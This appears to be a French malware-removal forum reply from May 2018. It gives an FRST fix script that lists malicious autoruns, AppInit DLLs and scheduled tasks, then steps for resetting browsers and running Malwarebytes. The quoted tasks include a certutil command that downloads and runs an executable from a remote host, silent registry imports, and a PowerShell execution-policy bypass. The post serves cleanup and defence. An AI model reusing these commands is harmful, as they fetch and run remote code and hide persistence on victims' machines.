HKU\S-1-5-21-3737552420-2105503091-1117032357-1005\...\Run: [QUVMAYUXRK19A8O] => C:\Program Files\6NA2MW1WSV\6NA2MW1WS.exe [666624 2018-05-25] ()
HKU\S-1-5-21-3737552420-2105503091-1117032357-1005\...\Run: [DTOGWQLS04J0RQP] => C:\Program Files\JJGZB5D6C4\JJGZB5D6C.exe [666624 2018-05-25] ()
HKU\S-1-5-21-3737552420-2105503091-1117032357-1005\...\Run: [MZC02BPLX1H8MSJ] => C:\Program Files\X2CK10ANY9\X2CK10ANY.exe [666624 2018-05-25] ()
HKU\S-1-5-21-3737552420-2105503091-1117032357-1005\...\Run: [5YI9LH5XG1WZ5X3] => C:\Program Files\NP80RGZ7K5\NP80RGZ7K.exe [666624 2018-05-25] ()
HKU\S-1-5-21-3737552420-2105503091-1117032357-1005\...\Run: [3XPITQ0MX8722MD] => C:\Program Files\B94IYUWEG4\B94IYUWEG.exe [666624 2018-05-25] ()
HKU\S-1-5-21-3737552420-2105503091-1117032357-1005\...\Run: [VGXYZPMB1ZO0GS2] => C:\Program Files\L6RE1PUZ99\L6RE1PUZ9.exe [666624 2018-05-25] ()
HKU\S-1-5-21-3737552420-2105503091-1117032357-1005\...\Run: [RY1PKDUR1KWDWZQ] => C:\Program Files\N2JG597NW8\N2JG597NW.exe [666624 2018-05-25] ()
HKU\S-1-5-21-3737552420-2105503091-1117032357-1005\...\Run: [VJRRZIYXO86RIWJ] => C:\Program Files\DZK5I8ILM4\DZK5I8ILM.exe [666624 2018-05-25] ()
HKU\S-1-5-21-3737552420-2105503091-1117032357-1005\...\Run: [KFGOFXQQS7XQ26F] => C:\Program Files\EXNDFSC5P0\EXNDFSC5P.exe [666624 2018-05-25] ()
HKU\S-1-5-21-3737552420-2105503091-1117032357-1005\...\Run: [8848247] => C:\Users\Victor\AppData\Roaming\qzk4tkbawhm\zmca5eakscp.exe [929945 2018-05-25] ( )
HKU\S-1-5-21-3737552420-2105503091-1117032357-1005\...\Run: [5602474] => C:\Users\Victor\AppData\Roaming\uxvhvioxtov\3qdl3jicgbz.exe [929945 2018-05-25] ( )
HKU\S-1-5-21-3737552420-2105503091-1117032357-1005\...\Run: [E7NK7GD8RYA3I2M] => C:\Program Files\IBPB36KIC6\IBPB36KIC.exe [666624 2018-05-25] ()
HKU\S-1-5-21-3737552420-2105503091-1117032357-1005\...\Run: [EN59E4R2CXPT3R2] => C:\Program Files\BY4CSEYHZX\BY4CSEYHZ.exe [666624 2018-05-25] ()
HKU\S-1-5-21-3737552420-2105503091-1117032357-1005\...\Run: [7494296] => C:\Users\Victor\AppData\Roaming\3ipzotsasey\0vtfl0ksh4f.exe [929945 2018-05-25] ( )
HKU\S-1-5-21-3737552420-2105503091-1117032357-1005\...\Run: [YGVSV2KUM4V47G2] => C:\Program Files\D3EIKIU11F\D3EIKIU11.exe [666624 2018-05-25] (2)
HKU\S-1-5-21-3737552420-2105503091-1117032357-1005\...\Run: [7612557] => C:\Users\Victor\AppData\Roaming\ouwintaxqlv\3jxx4yv1t4m.exe [929945 2018-05-25] ( )
HKU\S-1-5-21-3737552420-2105503091-1117032357-1005\...\Run: [T908YJ2YFOV590O] => C:\Program Files\AD92IJ4LPY\AD92IJ4LP.exe [666624 2018-05-25] (2)
HKU\S-1-5-18\...\Run: [Web Companion] => C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe --minimize
AppInit_DLLs: C:\ProgramData\Quoteex\Danplus.dll => C:\ProgramData\Quoteex\Danplus.dll [342528 2018-05-24] ()
AppInit_DLLs-x32: C:\ProgramData\Quoteex\Tameco.dll => C:\ProgramData\Quoteex\Tameco.dll [460800 2018-05-24] ()
Task: {1894E700-944C-4031-AEAA-1CA149D39F8B} - System32\Tasks\psv_VillaString => cmd.exe /c regedit.exe /s "C:\ProgramData\Quoteex\Don-Fax.reg" & del "C:\ProgramData\Quoteex\Don-Fax.reg" & SCHTASKS /Delete /TN "psv_VillaString" /F <==== ATTENTION
Task: {43FCC4F1-E467-4082-A41A-C3DD1DAA2908} - System32\Tasks\FastDataX Task => C:\Program Files (x86)\FastDataX\FastDataX.exe [2018-04-23] () <==== ATTENTION
Task: {A599452F-5E1E-47CA-9AA1-EF0F3A46212D} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-05-22] () <==== ATTENTION
Task: {AD3177E1-0D4D-44E4-BC22-9736BD542462} - System32\Tasks\psv_Tranla => cmd.exe /c regedit.exe /s "C:\ProgramData\Quoteex\Medron.reg" & del "C:\ProgramData\Quoteex\Medron.reg" & SCHTASKS /Delete /TN "psv_Tranla" /F <==== ATTENTION
Task: {BB4AE05F-6435-4949-BA90-B7BC1456CC3D} - System32\Tasks\psv_Fixhome => cmd.exe /c regedit.exe /s "C:\ProgramData\Quoteex\Zoo-Hold.reg" & del "C:\ProgramData\Quoteex\Zoo-Hold.reg" & SCHTASKS /Delete /TN "psv_Fixhome" /F <==== ATTENTION
Task: {BFE8FAD1-FA45-488F-9C0C-58FD284EDA63} - System32\Tasks\psv_UnoNimtop => cmd.exe /c regedit.exe /s "C:\ProgramData\Quoteex\Vivaair.reg" & del "C:\ProgramData\Quoteex\Vivaair.reg" & SCHTASKS /Delete /TN "psv_UnoNimtop" /F <==== ATTENTION
Task: {D811EDCC-654E-4EB8-9FAC-49C8983487E7} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.14.17639.18041-0\MpCmdRun.exe [2018-04-25] (Microsoft Corporation)
Task: {EFC403A7-C06B-4F72-8F24-484A15438CFB} - System32\Tasks\CreateExplorerShellUnelevatedTask => C:\Windows\explorer.exe /NOUACCHECK
Task: {EFD770CF-5AC1-4B00-A9CF-CF45C1DA4391} - System32\Tasks\MainPM => powershell -ExecutionPolicy ByPass -File pm.ps1
Task: {F940DB2D-BD9E-4F9D-AD42-41A0B96315FF} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://dp.fastandcoolest.com/app/4/app.exe C:\Users\Victor\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Victor\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
Task: {FBD435FF-C16D-4083-B80F-D824035D395F} - System32\Tasks\psv_Zoobam => cmd.exe /c regedit.exe /s "C:\ProgramData\Quoteex\Transair.reg" & del "C:\ProgramData\Quoteex\Transair.reg" & SCHTASKS /Delete /TN "psv_Zoobam" /F <==== ATTENTION
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
Enregistre le contenu par le menu fichier puis enregistrer.
Ferme le bloc-note, retourne sur FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire et automatique.
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
- Réparer Mozilla Firefox (premier paragraphe)
- Réparer Google Chrome (seulement le premier paragraphe).
- Réinitialiser et réparer Internet Explorer
3°)
Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite
4°)
Vois ce que cela donne et si des améliorations ont eu lieu.
Si ce n'est pas le cas, si tu as encore des pages de pubs intempestives, précise sur quel navigateur WEB.
Refais un scan FRST et donne les nouveaux rapports via pjjoint.
25 mai 2018 à 14:57
https://pjjoint.malekal.com/files.php?id=20180525_g15h8n13y8s13
https://pjjoint.malekal.com/files.php?id=20180525_l15w6f5e9k11